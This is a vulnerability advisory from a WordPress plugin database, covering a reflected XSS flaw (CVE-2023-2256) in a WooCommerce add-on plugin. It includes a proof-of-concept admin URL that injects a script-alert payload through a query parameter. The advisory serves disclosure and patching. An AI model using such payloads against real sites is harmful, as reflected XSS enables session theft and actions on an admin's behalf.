WordPress Plugin Vulnerabilities

Product Addons & Fields for WooCommerce < 32.0.7 - Reflected Cross-Site Scripting

Description

The plugin does not sanitize and escape some URL parameters, leading to Reflected Cross-Site Scripting.

Proof of Concept

Ensure WooCommerce is installed. Visit the following path, while logged in as an Admin:

/wp-admin/admin.php?page=ppom&productmeta_id=5&do_meta=edit&"><script>alert(/XSS/)</script>=1

Affects Plugins

Plugin icon
woocommerce-product-addon
Fixed in 32.0.7

References

CVE
CVE-2023-2256

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
https://wpscan.com
Verified
Yes
WPVDB ID
1187e041-3be2-4613-8d56-c2394fcc75fb

Timeline

Publicly Published
2023-05-01 (about 1 years ago)
Added
2023-05-03 (about 1 years ago)
Last Updated
2023-05-04 (about 1 years ago)

Other

Published
Title
Published
2021-07-01
Title
Leaflet Map < 3.0.0 - Contributor+ Stored XSS
Published
2023-10-29
Title
Buzzsprout Podcasting < 1.8.5 - Contributor+ Stored Cross-Site Scripting
Published
2014-08-01
Title
SABRE < 1.2.2 - Cross Site Scripting
Published
2014-08-01
Title
Responsive Logo Slideshow - URL & Image Field XSS
Published
2024-03-28
Title
B Slider - Slider for your block editor < 1.1.13 - Authenticated (Contributor+) Stored Cross-Site Scripting